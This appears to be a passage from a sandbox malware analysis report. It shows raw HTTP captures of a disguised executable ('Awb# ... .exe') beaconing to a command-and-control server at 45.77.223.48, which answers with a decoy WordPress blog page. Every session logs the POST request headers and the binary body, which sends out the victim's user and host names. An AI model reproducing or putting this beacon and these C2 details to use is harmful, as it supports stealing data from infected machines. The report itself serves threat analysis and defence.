                                              Apr 25, 2024 09:43:32.605087042 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              74192.168.2.44982445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:32.856501102 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:32.984330893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:34.032939911 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:32 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:34.032960892 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:34.033122063 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: UTF-8" />
                                              Apr 25, 2024 09:43:34.033159018 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:34.041162014 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:34.041817904 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:34.042032957 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:34.042083025 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:34.042227983 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:34.042278051 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              75192.168.2.44982545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:34.305329084 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:34.431329966 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:35.267355919 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:34 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:35.267420053 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:35.267494917 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:35.276050091 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:35.276364088 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:35.276539087 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:35.276633024 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:35.276987076 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:35.277004957 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:35.277136087 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              76192.168.2.44982645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:35.562439919 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:35.692501068 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:36.506069899 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:35 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:36.506160021 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:36.506342888 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:36.516060114 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:36.516546011 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:36.516798973 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:36.516978979 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:36.517076015 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:36.517198086 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:36.517224073 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              77192.168.2.44982745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:36.805880070 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:36.933487892 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:40.748475075 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:36 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:40.748600006 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                              Data Ascii: <!DOCTYPE html><html
                                              Apr 25, 2024 09:43:40.748936892 CEST12INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22
                                              Data Ascii: lang="en-US"
                                              Apr 25, 2024 09:43:40.749048948 CEST25INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: ><head><meta charset="
                                              Apr 25, 2024 09:43:40.749372959 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:43:40.749569893 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:43:40.749623060 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:40.758192062 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:40.758508921 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:40.758635998 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              78192.168.2.44982845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:41.014214039 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:41.145092964 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:42.280194998 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:41 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:42.280249119 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:42.280909061 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:42.288948059 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:42.289463997 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:42.289578915 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:42.289697886 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:42.289897919 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:42.289948940 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:42.289964914 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


